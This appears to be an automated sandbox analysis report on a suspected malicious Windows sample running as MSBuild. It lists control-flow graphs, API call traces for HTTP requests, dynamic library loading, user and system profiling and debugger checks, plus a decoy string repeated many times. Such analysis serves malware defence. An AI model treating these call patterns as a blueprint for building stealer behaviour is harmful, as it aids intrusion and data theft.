                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                                                    • strlen.MSVCRT ref: 004046F0
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                                    • VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 0040479C
                                                                    Strings
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                    • API String ID: 2127927946-2218711628
                                                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                    • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                    • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 856 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA 864 406314-406318 856->864 865 40630d 856->865 866 406509-406525 call 41a7a0 call 41a800 * 2 864->866 867 40631e-406342 InternetConnectA 864->867 865->864 882 406528-40652d 866->882 869 406348-40634c 867->869 870 4064ff-406502 867->870 872 40635a 869->872 873 40634e-406358 869->873 870->866 875 406364-406392 872->875 873->875 880 4064f5-4064f8 875->880 881 406398-40639c 875->881 880->870 883 4063c5-406405 HttpSendRequestA 881->883 884 40639e-4063be 881->884 886 406407-406427 call 41a740 call 41a800 * 2 883->886 887 40642c-40644b call 418940 883->887 884->883 886->882 893 4064c9-4064e9 call 41a740 call 41a800 * 2 887->893 894 40644d-406454 887->894 893->882 897 406456-406480 InternetReadFile 894->897 898 4064c7-4064ee 894->898 902 406482-406489 897->902 903 40648b 897->903 898->880 902->903 906 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 902->906 903->898 906->897
                                                                    APIs
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$??2@$ConnectCrackFileHttpOpenReadRequestSend
                                                                    • String ID: ERROR$ERROR$GET
                                                                    • API String ID: 1522062773-2509457195
                                                                    • Opcode ID: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
                                                                    • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                                    • Opcode Fuzzy Hash: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
                                                                    • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56
                                                                    APIs
                                                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                    • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                                    • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                                    • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                                    APIs
                                                                    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                    • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                                    • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                                    • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 725 419c10-419c1a 726 419c20-41a031 725->726 727 41a036-41a0ca LoadLibraryA * 8 725->727 726->727 728 41a146-41a14d 727->728 729 41a0cc-41a141 727->729 731 41a153-41a211 728->731 732 41a216-41a21d 728->732 729->728 731->732 733 41a298-41a29f 732->733 734 41a21f-41a293 732->734 736 41a2a5-41a332 733->736 737 41a337-41a33e 733->737 734->733 736->737 740 41a344-41a41a 737->740 741 41a41f-41a426 737->741 740->741 744 41a4a2-41a4a9 741->744 745 41a428-41a49d 741->745 750 41a4ab-41a4d7 744->750 751 41a4dc-41a4e3 744->751 745->744 750->751 754 41a515-41a51c 751->754 755 41a4e5-41a510 751->755 763 41a612-41a619 754->763 764 41a522-41a60d 754->764 755->754 766 41a61b-41a678 763->766 767 41a67d-41a684 763->767 764->763 766->767 778 41a686-41a699 767->778 779 41a69e-41a6a5 767->779 778->779 783 41a6a7-41a703 779->783 784 41a708-41a709 779->784 783->784
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                                    • LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                    • API String ID: 1029625771-1775429166
                                                                    • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                    • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                                    • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                                    • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 916 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 933 404944 916->933 934 40494b-40494f 916->934 933->934 935 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 934->935 936 404ecb-404ef3 call 41aad0 call 409ac0 934->936 935->936 1024 404ad3-404ad7 935->1024 949 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 936->949 950 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 936->950 950->949 1025 404ae5 1024->1025 1026 404ad9-404ae3 1024->1026 1027 404aef-404b22 1025->1027 1026->1027 1029 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 * 4 1027->1029 1030 404ebe-404ec4 1027->1030 1144 404e32-404e5c 1029->1144 1030->936 1146 404e67-404eb9 InternetCloseHandle call 41a800 1144->1146 1147 404e5e-404e65 1144->1147 1146->1030 1147->1146 1148 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 1147->1148 1148->1144
                                                                    APIs
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@$Internet$CloseCrackHandle
                                                                    • String ID: "$"$------$------$------
                                                                    • API String ID: 3842476067-2180234286
                                                                    • Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                                                                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                                    • Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
                                                                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ??2@$CrackInternet
                                                                    • String ID: <
                                                                    • API String ID: 676793843-4251816714
                                                                    • Opcode ID: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
                                                                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                                    • Opcode Fuzzy Hash: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
                                                                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1385 419860-419874 call 419750 1388 419a93-419af2 LoadLibraryA * 3 1385->1388 1389 41987a-419a8e call 419780 1385->1389 1395 419af4-419b08 1388->1395 1396 419b0d-419b14 1388->1396 1389->1388 1395->1396 1397 419b46-419b4d 1396->1397 1398 419b16-419b41 1396->1398 1401 419b68-419b6f 1397->1401 1402 419b4f-419b63 1397->1402 1398->1397 1403 419b71-419b84 1401->1403 1404 419b89-419b90 1401->1404 1402->1401 1403->1404 1407 419bc1-419bc2 1404->1407 1408 419b92-419bbc 1404->1408 1408->1407
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419A9A
                                                                    • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419AAB
                                                                    • LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419ACF
                                                                    Strings
                                                                    • NtQueryInformationProcess, xrefs: 00419BAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 1029625771-2781105232
                                                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                    • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                    • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1432 4117a0-4117cd call 41aad0 1436 4117d7-4117f1 call 41aad0 strtok_s 1432->1436 1437 4117cf-4117d1 ExitProcess 1432->1437 1440 4117f4-4117f8 1436->1440 1441 4119c2-4119cd call 41a800 1440->1441 1442 4117fe-411811 1440->1442 1444 411817-41181a 1442->1444 1445 41199e-4119bd strtok_s 1442->1445 1447 411821-411830 call 41a820 1444->1447 1448 411849-411858 call 41a820 1444->1448 1449 4118ad-4118be 1444->1449 1450 4118cf-4118e0 1444->1450 1451 41198f-411999 call 41a820 1444->1451 1452 4118f1-411902 1444->1452 1453 411951-411962 1444->1453 1454 411970-411981 1444->1454 1455 411913-411924 1444->1455 1456 411932-411943 1444->1456 1457 411835-411844 call 41a820 1444->1457 1458 41185d-41186e 1444->1458 1459 41187f-411890 1444->1459 1445->1440 1447->1445 1448->1445 1476 4118c0-4118c3 1449->1476 1477 4118ca 1449->1477 1478 4118e2-4118e5 1450->1478 1479 4118ec 1450->1479 1451->1445 1480 411904-411907 1452->1480 1481 41190e 1452->1481 1488 411964-411967 1453->1488 1489 41196e 1453->1489 1492 411983-411986 1454->1492 1493 41198d 1454->1493 1482 411930 1455->1482 1483 411926-411929 1455->1483 1484 411945-411948 1456->1484 1485 41194f 1456->1485 1457->1445 1486 411870-411873 1458->1486 1487 41187a 1458->1487 1490 411892-41189c 1459->1490 1491 41189e-4118a1 1459->1491 1476->1477 1477->1445 1478->1479 1479->1445 1480->1481 1481->1445 1482->1445 1483->1482 1484->1485 1485->1445 1486->1487 1487->1445 1488->1489 1489->1445 1494 4118a8 1490->1494 1491->1494 1492->1493 1493->1445 1494->1445
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strtok_s$ExitProcess
                                                                    • String ID: block
                                                                    • API String ID: 762877946-2199623458
                                                                    • Opcode ID: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
                                                                    • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                                    • Opcode Fuzzy Hash: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
                                                                    • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
